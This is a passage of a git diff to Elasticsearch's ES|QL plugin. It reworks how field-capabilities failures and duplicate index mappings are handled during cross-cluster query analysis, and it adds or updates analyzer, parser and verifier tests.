EsqlExecutionInfo.Cluster.Status.SUCCESSFUL : "can't mark a cluster success with failures"; + continue; + } + if (allowPartialResults == false && executionInfo.isSkipUnavailable(clusterAlias) == false) { + for (FieldCapabilitiesFailure failure : e.getValue()) { + failureCollector.unwrapAndCollect(failure.getException()); + } + } else if (cluster.getFailures().isEmpty()) { + var shardFailures = e.getValue().stream().map(f -> { + ShardId shardId = null; + if (ExceptionsHelper.unwrapCause(f.getException()) instanceof ElasticsearchException es) { + shardId = es.getShardId(); + } + if (shardId != null) { + return new ShardSearchFailure(f.getException(), new SearchShardTarget(null, shardId, clusterAlias)); + } else { + return new ShardSearchFailure(f.getException()); + } + }).toList(); + executionInfo.swapCluster( + clusterAlias, + (k, curr) -> new EsqlExecutionInfo.Cluster.Builder(cluster).addFailures(shardFailures).build() + ); + } + } + Exception failure = failureCollector.getFailure(); + if (failure != null) { + throw failure; + } + } + public void analyzedPlan( LogicalPlan parsed, EsqlExecutionInfo executionInfo, @@ -342,7 +396,8 @@ public void analyzedPlan( return; } - Function analyzeAction = (l) -> { + CheckedFunction analyzeAction = (l) -> { + handleFieldCapsFailures(configuration.allowPartialResults(), executionInfo, l.indices.failures()); Analyzer analyzer = new Analyzer( new AnalyzerContext(configuration, functionRegistry, l.indices, l.lookupIndices, l.enrichResolution, l.inferenceResolution), verifier @@ -402,8 +457,8 @@ public void analyzedPlan( try { // the order here is tricky - if the cluster has been filtered and later became unavailable, // do we want to declare it successful or skipped? For now, unavailability takes precedence. - EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, result.indices.unavailableClusters()); - EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, result.indices, null); + EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, result.indices.failures()); + EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, result.indices, false); plan = analyzeAction.apply(result); } catch (Exception e) { l.onFailure(e); @@ -485,11 +540,7 @@ private void preAnalyzeMainIndices( result.fieldNames, requestFilter, listener.delegateFailure((l, indexResolution) -> { - if (configuration.allowPartialResults() == false && indexResolution.getUnavailableShards().isEmpty() == false) { - l.onFailure(indexResolution.getUnavailableShards().iterator().next()); - } else { - l.onResponse(result.withIndexResolution(indexResolution)); - } + l.onResponse(result.withIndexResolution(indexResolution)); }) ); } @@ -514,7 +565,7 @@ private boolean allCCSClustersSkipped( ActionListener logicalPlanListener ) { IndexResolution indexResolution = result.indices; - EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, indexResolution.unavailableClusters()); + EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, indexResolution.failures()); if (executionInfo.isCrossClusterSearch() && executionInfo.getClusterStates(EsqlExecutionInfo.Cluster.Status.RUNNING).findAny().isEmpty()) { // for a CCS, if all clusters have been marked as SKIPPED, nothing to search so send a sentinel Exception @@ -528,7 +579,7 @@ private boolean allCCSClustersSkipped( } private static void analyzeAndMaybeRetry( - Function analyzeAction, + CheckedFunction analyzeAction, QueryBuilder requestFilter, PreAnalysisResult result, EsqlExecutionInfo executionInfo, @@ -544,7 +595,9 @@ private static void analyzeAndMaybeRetry( if (result.indices.isValid() || requestFilter != null) { // We won't run this check with no filter and no valid indices since this may lead to false positive - missing index report // when the resolution result is not valid for a different reason. - EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, result.indices, requestFilter); + if (executionInfo.clusterInfo.isEmpty() == false) { + EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, result.indices, requestFilter != null); + } } plan = analyzeAction.apply(result); } catch (Exception e) { @@ -627,16 +680,20 @@ static PreAnalysisResult fieldNames(LogicalPlan parsed, Set enrichPolicy } var referencesBuilder = AttributeSet.builder(); - // "keep" and "drop" attributes are special whenever a wildcard is used in their name, as the wildcard can shadow some - // attributes ("lookup join" generated columns among others) and steps like removal of Aliases should ignore the fields - // to remove if their name matches one of these wildcards. + // "keep" and "drop" attributes are special whenever a wildcard is used in their name, as the wildcard can cover some + // attributes ("lookup join" generated columns among others); steps like removal of Aliases should ignore fields matching the + // wildcards. // - // ie "from test | eval lang = languages + 1 | keep *l" should consider both "languages" and "*l" as valid fields to ask for - // "from test | eval first_name = 1 | drop first_name | drop *name should also consider "*name" as valid field to ask for + // E.g. "from test | eval lang = languages + 1 | keep *l" should consider both "languages" and "*l" as valid fields to ask for + // "from test | eval first_name = 1 | drop first_name | drop *name" should also consider "*name" as valid field to ask for // // NOTE: the grammar allows wildcards to be used in other commands as well, but these are forbidden in the LogicalPlanBuilder - var shadowingRefsBuilder = AttributeSet.builder(); - var keepJoinRefsBuilder = AttributeSet.builder(); + // Except in KEEP and DROP. + var keepRefs = AttributeSet.builder(); + var dropWildcardRefs = AttributeSet.builder(); + // fields required to request for lookup joins to work + var joinRefs = AttributeSet.builder(); + // lookup indices where we request "*" because we may require all their fields Set wildcardJoinIndices = new java.util.HashSet<>(); boolean[] canRemoveAliases = new boolean[] { true }; @@ -654,14 +711,14 @@ static PreAnalysisResult fieldNames(LogicalPlan parsed, Set enrichPolicy referencesBuilder.addAll(enrichRefs); } else if (p instanceof LookupJoin join) { if (join.config().type() instanceof JoinTypes.UsingJoinType usingJoinType) { - keepJoinRefsBuilder.addAll(usingJoinType.columns()); + joinRefs.addAll(usingJoinType.columns()); } - if (shadowingRefsBuilder.isEmpty()) { + if (keepRefs.isEmpty()) { // No KEEP commands after the JOIN, so we need to mark this index for "*" field resolution wildcardJoinIndices.add(((UnresolvedRelation) join.right()).indexPattern().indexPattern()); } else { // Keep commands can reference the join columns with names that shadow aliases, so we block their removal - keepJoinRefsBuilder.addAll(shadowingRefsBuilder); + joinRefs.addAll(keepRefs); } } else { referencesBuilder.addAll(p.references()); @@ -673,10 +730,16 @@ static PreAnalysisResult fieldNames(LogicalPlan parsed, Set enrichPolicy p.forEachExpression(UnresolvedNamePattern.class, up -> { var ua = new UnresolvedAttribute(up.source(), up.name()); referencesBuilder.add(ua); - shadowingRefsBuilder.add(ua); + if (p instanceof Keep) { + keepRefs.add(ua); + } else if (p instanceof Drop) { + dropWildcardRefs.add(ua); + } else { + throw new IllegalStateException("Only KEEP and DROP should allow wildcards"); + } }); if (p instanceof Keep) { - shadowingRefsBuilder.addAll(p.references()); + keepRefs.addAll(p.references()); } } @@ -710,13 +773,15 @@ static PreAnalysisResult fieldNames(LogicalPlan parsed, Set enrichPolicy if (fieldNames.contains(ne.name())) { return; } - referencesBuilder.removeIf(attr -> matchByName(attr, ne.name(), shadowingRefsBuilder.contains(attr))); + referencesBuilder.removeIf( + attr -> matchByName(attr, ne.name(), keepRefs.contains(attr) || dropWildcardRefs.contains(attr)) + ); }); } }); // Add JOIN ON column references afterward to avoid Alias removal - referencesBuilder.addAll(keepJoinRefsBuilder); + referencesBuilder.addAll(joinRefs); // If any JOIN commands need wildcard field-caps calls, persist the index names if (wildcardJoinIndices.isEmpty() == false) { result = result.withWildcardJoinIndices(wildcardJoinIndices); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/IndexResolver.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/IndexResolver.java index d2f79ceb1316f..945fe4a8dc4b3 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/IndexResolver.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/IndexResolver.java @@ -7,8 +7,6 @@ package org.elasticsearch.xpack.esql.session; import org.elasticsearch.action.ActionListener; -import org.elasticsearch.action.NoShardAvailableActionException; -import org.elasticsearch.action.fieldcaps.FieldCapabilitiesFailure; import org.elasticsearch.action.fieldcaps.FieldCapabilitiesIndexResponse; import org.elasticsearch.action.fieldcaps.FieldCapabilitiesRequest; import org.elasticsearch.action.fieldcaps.FieldCapabilitiesResponse; @@ -94,13 +92,15 @@ public void resolveAsMergedMapping( // public for testing only public static IndexResolution mergedMappings(String indexPattern, FieldCapabilitiesResponse fieldCapsResponse) { - var numberOfIndices = fieldCapsResponse.getIndexResponses().size(); assert ThreadPool.assertCurrentThreadPool(ThreadPool.Names.SEARCH_COORDINATION); // too expensive to run this on a transport worker + var numberOfIndices = fieldCapsResponse.getIndexResponses().size(); if (fieldCapsResponse.getIndexResponses().isEmpty()) { return IndexResolution.notFound(indexPattern); } - Map> fieldsCaps = collectFieldCaps(fieldCapsResponse); + var collectedFieldCaps = collectFieldCaps(fieldCapsResponse); + Map fieldsCaps = collectedFieldCaps.fieldsCaps; + Map indexMappingHashDuplicates = collectedFieldCaps.indexMappingHashDuplicates; // Build hierarchical fields - it's easier to do it in sorted order so the object fields come first. // TODO flattened is simpler - could we get away with that? @@ -132,7 +132,8 @@ public static IndexResolution mergedMappings(String indexPattern, FieldCapabilit } // TODO we're careful to make isAlias match IndexResolver - but do we use it? - List fcs = fieldsCaps.get(fullName); + var fieldCap = fieldsCaps.get(fullName); + List fcs = fieldCap.fieldCapabilities; EsField field = firstUnsupportedParent == null ? createField(fieldCapsResponse, name, fullName, fcs, isAlias) : new UnsupportedEsField( @@ -142,24 +143,12 @@ public static IndexResolution mergedMappings(String indexPattern, FieldCapabilit new HashMap<>() ); fields.put(name, field); - - var isPartiallyUnmapped = fcs.size() < numberOfIndices; + var isPartiallyUnmapped = fcs.size() + indexMappingHashDuplicates.getOrDefault(fieldCap.indexMappingHash, 0) < numberOfIndices; if (isPartiallyUnmapped) { partiallyUnmappedFields.add(fullName); } } - Map unavailableRemotes = EsqlCCSUtils.determineUnavailableRemoteClusters( - fieldCapsResponse.getFailures() - ); - - Set unavailableShards = new HashSet<>(); - for (FieldCapabilitiesFailure failure : fieldCapsResponse.getFailures()) { - if (failure.getException() instanceof NoShardAvailableActionException e) { - unavailableShards.add(e); - } - } - Map concreteIndices = Maps.newMapWithExpectedSize(fieldCapsResponse.getIndexResponses().size()); for (FieldCapabilitiesIndexResponse ir : fieldCapsResponse.getIndexResponses()) { concreteIndices.put(ir.getIndexName(), ir.getIndexMode()); @@ -171,14 +160,24 @@ public static IndexResolution mergedMappings(String indexPattern, FieldCapabilit } // If all the mappings are empty we return an empty set of resolved indices to line up with QL var index = new EsIndex(indexPattern, rootFields, allEmpty ? Map.of() : concreteIndices, partiallyUnmappedFields); - return IndexResolution.valid(index, concreteIndices.keySet(), unavailableShards, unavailableRemotes); + var failures = EsqlCCSUtils.groupFailuresPerCluster(fieldCapsResponse.getFailures()); + return IndexResolution.valid(index, concreteIndices.keySet(), failures); } - private static Map> collectFieldCaps(FieldCapabilitiesResponse fieldCapsResponse) { - Set seenHashes = new HashSet<>(); - Map> fieldsCaps = new HashMap<>(); + private record IndexFieldCapabilitiesWithSourceHash(List fieldCapabilities, String indexMappingHash) {} + + private record CollectedFieldCaps( + Map fieldsCaps, + // The map won't contain entries without duplicates, i.e., it's number of occurrences - 1. + Map indexMappingHashDuplicates + ) {} + + private static CollectedFieldCaps collectFieldCaps(FieldCapabilitiesResponse fieldCapsResponse) { + Map indexMappingHashToDuplicateCount = new HashMap<>(); + Map fieldsCaps = new HashMap<>(); + for (FieldCapabilitiesIndexResponse response : fieldCapsResponse.getIndexResponses()) { - if (seenHashes.add(response.getIndexMappingHash()) == false) { + if (indexMappingHashToDuplicateCount.compute(response.getIndexMappingHash(), (k, v) -> v == null ? 1 : v + 1) > 1) { continue; } for (IndexFieldCapabilities fc : response.get().values()) { @@ -186,11 +185,25 @@ private static Map> collectFieldCaps(FieldC // ESQL builds the metadata fields if they are asked for without using the resolution. continue; } - List all = fieldsCaps.computeIfAbsent(fc.name(), (_key) -> new ArrayList<>()); + List all = fieldsCaps.computeIfAbsent( + fc.name(), + (_key) -> new IndexFieldCapabilitiesWithSourceHash(new ArrayList<>(), response.getIndexMappingHash()) + ).fieldCapabilities; all.add(fc); } } - return fieldsCaps; + + var iterator = indexMappingHashToDuplicateCount.entrySet().iterator(); + while (iterator.hasNext()) { + var next = iterator.next(); + if (next.getValue() <= 1) { + iterator.remove(); + } else { + next.setValue(next.getValue() - 1); + } + } + + return new CollectedFieldCaps(fieldsCaps, indexMappingHashToDuplicateCount); } private static EsField createField( diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/CsvTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/CsvTests.java index 6935a1efac2ae..f2f1568242d25 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/CsvTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/CsvTests.java @@ -88,6 +88,7 @@ import org.elasticsearch.xpack.esql.planner.PlannerUtils; import org.elasticsearch.xpack.esql.planner.TestPhysicalOperationProviders; import org.elasticsearch.xpack.esql.planner.mapper.Mapper; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.plugin.QueryPragmas; import org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.session.EsqlSession; @@ -566,7 +567,7 @@ private static TestPhysicalOperationProviders testOperationProviders( } private ActualResults executePlan(BigArrays bigArrays) throws Exception { - LogicalPlan parsed = parser.createStatement(testCase.query); + LogicalPlan parsed = parser.createStatement(testCase.query, EsqlTestUtils.TEST_CFG); var testDatasets = testDatasets(parsed); LogicalPlan analyzed = analyzedPlan(parsed, testDatasets); @@ -715,7 +716,7 @@ void executeSubPlan( var searchStats = new DisabledSearchStats(); var logicalTestOptimizer = new LocalLogicalPlanOptimizer(new LocalLogicalOptimizerContext(configuration, foldCtx, searchStats)); var physicalTestOptimizer = new TestLocalPhysicalPlanOptimizer( - new LocalPhysicalOptimizerContext(configuration, foldCtx, searchStats) + new LocalPhysicalOptimizerContext(new EsqlFlags(true), configuration, foldCtx, searchStats) ); var csvDataNodePhysicalPlan = PlannerUtils.localPlan(dataNodePlan, logicalTestOptimizer, physicalTestOptimizer); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfoTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfoTests.java index 111d86669af22..19899e62ca057 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfoTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfoTests.java @@ -57,7 +57,7 @@ public void testHasMetadataPartial() { assertFalse(info.hasMetadataToReport()); info.swapCluster(key, (k, v) -> { EsqlExecutionInfo.Cluster.Builder builder = new EsqlExecutionInfo.Cluster.Builder(v); - builder.setFailures(List.of(new ShardSearchFailure(new IllegalStateException("shard failure")))); + builder.addFailures(List.of(new ShardSearchFailure(new IllegalStateException("shard failure")))); return builder.build(); }); assertTrue(info.hasMetadataToReport()); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTestUtils.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTestUtils.java index 5e6c37545a396..85492117bc542 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTestUtils.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTestUtils.java @@ -36,9 +36,9 @@ import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.GEO_MATCH_TYPE; import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.MATCH_TYPE; import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.RANGE_TYPE; +import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_CFG; import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_VERIFIER; import static org.elasticsearch.xpack.esql.EsqlTestUtils.configuration; -import static org.elasticsearch.xpack.esql.EsqlTestUtils.emptyInferenceResolution; public final class AnalyzerTestUtils { @@ -61,27 +61,36 @@ public static Analyzer analyzer(IndexResolution indexResolution, Map lookupResolution, Verifier verifier) { + return analyzer(indexResolution, lookupResolution, defaultEnrichResolution(), verifier); + } + + public static Analyzer analyzer( + IndexResolution indexResolution, + Map lookupResolution, + EnrichResolution enrichResolution, + Verifier verifier + ) { + return analyzer(indexResolution, lookupResolution, enrichResolution, verifier, TEST_CFG); + } + + public static Analyzer analyzer( + IndexResolution indexResolution, + Map lookupResolution, + EnrichResolution enrichResolution, + Verifier verifier, + Configuration config + ) { return new Analyzer( new AnalyzerContext( - EsqlTestUtils.TEST_CFG, + config, new EsqlFunctionRegistry(), indexResolution, lookupResolution, - defaultEnrichResolution(), + enrichResolution, defaultInferenceResolution() ), verifier @@ -89,17 +98,7 @@ public static Analyzer analyzer(IndexResolution indexResolution, Map enrichFields = new ArrayList<>(indexResolution.get().mapping().keySet()); + enrichFields.remove(field); + enrich.addResolvedPolicy( + policy, + mode, + new ResolvedEnrichPolicy(field, policyType, enrichFields, Map.of("", index), indexResolution.get().mapping()) + ); + } + public static void loadEnrichPolicyResolution(EnrichResolution enrich, String policy, String field, String index, String mapping) { loadEnrichPolicyResolution(enrich, EnrichPolicy.MATCH_TYPE, policy, field, index, mapping); } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTests.java index b99050b8ef090..4ef6f36522b5d 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/AnalyzerTests.java @@ -12,6 +12,7 @@ import org.elasticsearch.action.fieldcaps.FieldCapabilitiesResponse; import org.elasticsearch.action.fieldcaps.IndexFieldCapabilities; import org.elasticsearch.action.fieldcaps.IndexFieldCapabilitiesBuilder; +import org.elasticsearch.common.hash.MessageDigests; import org.elasticsearch.common.lucene.BytesRefs; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.index.IndexMode; @@ -89,6 +90,7 @@ import org.elasticsearch.xpack.esql.session.IndexResolver; import java.io.IOException; +import java.nio.charset.StandardCharsets; import java.time.Period; import java.util.ArrayList; import java.util.List; @@ -2006,7 +2008,7 @@ public void testUnsupportedTypesInStats() { | stats avg(x), count_distinct(x), max(x), median(x), median_absolute_deviation(x), min(x), percentile(x, 10), sum(x) """, """ Found 8 problems - line 2:12: argument of [avg(x)] must be [numeric except unsigned_long or counter types],\ + line 2:12: argument of [avg(x)] must be [aggregate_metric_double or numeric except unsigned_long or counter types],\ found value [x] type [unsigned_long] line 2:20: argument of [count_distinct(x)] must be [any exact type except unsigned_long, _source, or counter types],\ found value [x] type [unsigned_long] @@ -2028,7 +2030,7 @@ public void testUnsupportedTypesInStats() { | stats avg(x), median(x), median_absolute_deviation(x), percentile(x, 10), sum(x) """, """ Found 5 problems - line 2:10: argument of [avg(x)] must be [numeric except unsigned_long or counter types],\ + line 2:10: argument of [avg(x)] must be [aggregate_metric_double or numeric except unsigned_long or counter types],\ found value [x] type [version] line 2:18: argument of [median(x)] must be [numeric except unsigned_long or counter types],\ found value [x] type [version] @@ -3017,6 +3019,27 @@ public void testResolveInsist_multiIndexFieldPartiallyExistsWithMultiTypesNoKeyw assertThat(attr.unresolvedMessage(), is(expected)); } + public void testResolveInsist_multiIndexSameMapping_fieldIsMapped() { + assumeTrue("Requires UNMAPPED FIELDS", EsqlCapabilities.Cap.UNMAPPED_FIELDS.isEnabled()); + + IndexResolution resolution = IndexResolver.mergedMappings( + "foo, bar", + new FieldCapabilitiesResponse( + List.of( + fieldCapabilitiesIndexResponse("foo", messageResponseMap("long")), + fieldCapabilitiesIndexResponse("bar", messageResponseMap("long")) + ), + List.of() + ) + ); + var plan = analyze("FROM foo, bar | INSIST_🐔 message", analyzer(resolution, TEST_VERIFIER)); + var limit = as(plan, Limit.class); + var insist = as(limit.child(), Insist.class); + var attribute = (FieldAttribute) EsqlTestUtils.singleValue(insist.output()); + assertThat(attribute.name(), is("message")); + assertThat(attribute.dataType(), is(DataType.LONG)); + } + public void testResolveInsist_multiIndexFieldPartiallyExistsWithMultiTypesWithKeyword_createsAnInvalidMappedField() { assumeTrue("Requires UNMAPPED FIELDS", EsqlCapabilities.Cap.UNMAPPED_FIELDS.isEnabled()); @@ -3472,7 +3495,11 @@ private static FieldCapabilitiesIndexResponse fieldCapabilitiesIndexResponse( String indexName, Map fields ) { - return new FieldCapabilitiesIndexResponse(indexName, indexName, fields, false, IndexMode.STANDARD); + String indexMappingHash = new String( + MessageDigests.sha256().digest(fields.toString().getBytes(StandardCharsets.UTF_8)), + StandardCharsets.UTF_8 + ); + return new FieldCapabilitiesIndexResponse(indexName, indexMappingHash, fields, false, IndexMode.STANDARD); } private static Map messageResponseMap(String date) { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/ParsingTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/ParsingTests.java index 348c4d4266b8e..54071ac86d59f 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/ParsingTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/ParsingTests.java @@ -19,7 +19,10 @@ import org.elasticsearch.xpack.esql.index.EsIndex; import org.elasticsearch.xpack.esql.index.IndexResolution; import org.elasticsearch.xpack.esql.parser.EsqlParser; +import org.elasticsearch.xpack.esql.parser.ParserUtils; import org.elasticsearch.xpack.esql.parser.ParsingException; +import org.elasticsearch.xpack.esql.parser.QueryParam; +import org.elasticsearch.xpack.esql.parser.QueryParams; import org.elasticsearch.xpack.esql.plan.logical.LogicalPlan; import org.elasticsearch.xpack.esql.plan.logical.Row; import org.elasticsearch.xpack.esql.type.EsqlDataTypeConverter; @@ -96,7 +99,7 @@ public void testInlineCast() throws IOException { if (EsqlDataTypeConverter.converterFunctionFactory(expectedType) == null) { continue; } - LogicalPlan plan = parser.createStatement("ROW a = 1::" + nameOrAlias); + LogicalPlan plan = parser.createStatement("ROW a = 1::" + nameOrAlias, TEST_CFG); Row row = as(plan, Row.class); assertThat(row.fields(), hasSize(1)); Function functionCall = (Function) row.fields().get(0).child(); @@ -157,9 +160,34 @@ public void testJoinTwiceOnTheSameField_TwoLookups() { } public void testInvalidLimit() { - assertEquals("1:13: Invalid value for LIMIT [foo: String], expecting a non negative integer", error("row a = 1 | limit \"foo\"")); - assertEquals("1:13: Invalid value for LIMIT [1.2: Double], expecting a non negative integer", error("row a = 1 | limit 1.2")); - assertEquals("1:13: Invalid value for LIMIT [-1], expecting a non negative integer", error("row a = 1 | limit -1")); + assertLimitWithAndWithoutParams("foo", "\"foo\"", DataType.KEYWORD); + assertLimitWithAndWithoutParams(1.2, "1.2", DataType.DOUBLE); + assertLimitWithAndWithoutParams(-1, "-1", DataType.INTEGER); + assertLimitWithAndWithoutParams(true, "true", DataType.BOOLEAN); + assertLimitWithAndWithoutParams(false, "false", DataType.BOOLEAN); + assertLimitWithAndWithoutParams(null, "null", DataType.NULL); + } + + private void assertLimitWithAndWithoutParams(Object value, String valueText, DataType type) { + assertEquals( + "1:13: value of [limit " + + valueText + + "] must be a non negative integer, found value [" + + valueText + + "] type [" + + type.typeName() + + "]", + error("row a = 1 | limit " + valueText) + ); + + assertEquals( + "1:13: value of [limit ?param] must be a non negative integer, found value [?param] type [" + type.typeName() + "]", + error( + "row a = 1 | limit ?param", + new QueryParams(List.of(new QueryParam("param", value, type, ParserUtils.ParamClassification.VALUE))) + ) + ); + } public void testInvalidSample() { @@ -181,13 +209,20 @@ public void testInvalidSample() { ); } - private String error(String query) { - ParsingException e = expectThrows(ParsingException.class, () -> defaultAnalyzer.analyze(parser.createStatement(query))); + private String error(String query, QueryParams params) { + ParsingException e = expectThrows( + ParsingException.class, + () -> defaultAnalyzer.analyze(parser.createStatement(query, params, TEST_CFG)) + ); String message = e.getMessage(); assertTrue(message.startsWith("line ")); return message.substring("line ".length()); } + private String error(String query) { + return error(query, new QueryParams()); + } + private static IndexResolution loadIndexResolution(String name) { return IndexResolution.valid(new EsIndex(INDEX_NAME, LoadMapping.loadMapping(name))); } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/VerifierTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/VerifierTests.java index 14e5c0615e2b4..6dd20c7b46719 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/VerifierTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/analysis/VerifierTests.java @@ -28,6 +28,7 @@ import org.elasticsearch.xpack.esql.parser.EsqlParser; import org.elasticsearch.xpack.esql.parser.QueryParam; import org.elasticsearch.xpack.esql.parser.QueryParams; +import org.elasticsearch.xpack.esql.plan.logical.Enrich; import java.util.ArrayList; import java.util.LinkedHashMap; @@ -37,8 +38,13 @@ import java.util.Map; import java.util.Set; +import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.MATCH_TYPE; +import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_CFG; +import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_VERIFIER; import static org.elasticsearch.xpack.esql.EsqlTestUtils.paramAsConstant; import static org.elasticsearch.xpack.esql.EsqlTestUtils.withDefaultLimitWarning; +import static org.elasticsearch.xpack.esql.analysis.AnalyzerTestUtils.defaultLookupResolution; +import static org.elasticsearch.xpack.esql.analysis.AnalyzerTestUtils.loadEnrichPolicyResolution; import static org.elasticsearch.xpack.esql.analysis.AnalyzerTestUtils.loadMapping; import static org.elasticsearch.xpack.esql.core.type.DataType.BOOLEAN; import static org.elasticsearch.xpack.esql.core.type.DataType.CARTESIAN_POINT; @@ -359,7 +365,7 @@ public void testAggsExpressionsInStatsAggs() { error("from test | stats max(max(salary)) by first_name") ); assertEquals( - "1:25: argument of [avg(first_name)] must be [numeric except unsigned_long or counter types]," + "1:25: argument of [avg(first_name)] must be [aggregate_metric_double or numeric except unsigned_long or counter types]," + " found value [first_name] type [keyword]", error("from test | stats count(avg(first_name)) by first_name") ); @@ -2219,6 +2225,148 @@ public void testFullTextFunctionsInStats() { } } + public void testRemoteEnrichAfterLookupJoin() { + EnrichResolution enrichResolution = new EnrichResolution(); + loadEnrichPolicyResolution( + enrichResolution, + Enrich.Mode.REMOTE, + MATCH_TYPE, + "languages", + "language_code", + "languages_idx", + "mapping-languages.json" + ); + var analyzer = AnalyzerTestUtils.analyzer( + loadMapping("mapping-default.json", "test"), + defaultLookupResolution(), + enrichResolution, + TEST_VERIFIER + ); + + String lookupCommand = randomBoolean() ? "LOOKUP JOIN test_lookup ON languages" : "LOOKUP JOIN languages_lookup ON language_code"; + + query(Strings.format(""" + FROM test + | EVAL language_code = languages + | ENRICH _remote:languages ON language_code + | %s + """, lookupCommand), analyzer); + + String err = error(Strings.format(""" + FROM test + | EVAL language_code = languages + | %s + | ENRICH _remote:languages ON language_code + """, lookupCommand), analyzer); + assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after LOOKUP JOIN")); + + err = error(Strings.format(""" + FROM test + | EVAL language_code = languages + | %s + | ENRICH _remote:languages ON language_code + | %s + """, lookupCommand, lookupCommand), analyzer); + assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after LOOKUP JOIN")); + + err = error(Strings.format(""" + FROM test + | EVAL language_code = languages + | %s + | EVAL x = 1 + | MV_EXPAND language_code + | ENRICH _remote:languages ON language_code + """, lookupCommand), analyzer); + assertThat(err, containsString("6:3: ENRICH with remote policy can't be executed after LOOKUP JOIN")); + } + + public void testRemoteEnrichAfterCoordinatorOnlyPlans() { + EnrichResolution enrichResolution = new EnrichResolution(); + loadEnrichPolicyResolution( + enrichResolution, + Enrich.Mode.REMOTE, + MATCH_TYPE, + "languages", + "language_code", + "languages_idx", + "mapping-languages.json" + ); + loadEnrichPolicyResolution( + enrichResolution, + Enrich.Mode.COORDINATOR, + MATCH_TYPE, + "languages", + "language_code", + "languages_idx", + "mapping-languages.json" + ); + var analyzer = AnalyzerTestUtils.analyzer( + loadMapping("mapping-default.json", "test"), + defaultLookupResolution(), + enrichResolution, + TEST_VERIFIER + ); + + query(""" + FROM test + | EVAL language_code = languages + | ENRICH _remote:languages ON language_code + | STATS count(*) BY language_name + """, analyzer); + + String err = error(""" + FROM test + | EVAL language_code = languages + | STATS count(*) BY language_code + | ENRICH _remote:languages ON language_code + """, analyzer); + assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after STATS")); + + err = error(""" + FROM test + | EVAL language_code = languages + | STATS count(*) BY language_code + | EVAL x = 1 + | MV_EXPAND language_code + | ENRICH _remote:languages ON language_code + """, analyzer); + assertThat(err, containsString("6:3: ENRICH with remote policy can't be executed after STATS")); + + query(""" + FROM test + | EVAL language_code = languages + | ENRICH _remote:languages ON language_code + | ENRICH _coordinator:languages ON language_code + """, analyzer); + + err = error(""" + FROM test + | EVAL language_code = languages + | ENRICH _coordinator:languages ON language_code + | ENRICH _remote:languages ON language_code + """, analyzer); + assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after another ENRICH with coordinator policy")); + + err = error(""" + FROM test + | EVAL language_code = languages + | ENRICH _coordinator:languages ON language_code + | EVAL x = 1 + | MV_EXPAND language_name + | DISSECT language_name "%{foo}" + | ENRICH _remote:languages ON language_code + """, analyzer); + assertThat(err, containsString("7:3: ENRICH with remote policy can't be executed after another ENRICH with coordinator policy")); + + err = error(""" + FROM test + | FORK (WHERE languages == 1) (WHERE languages == 2) + | EVAL language_code = languages + | ENRICH _remote:languages ON language_code + """, analyzer); + 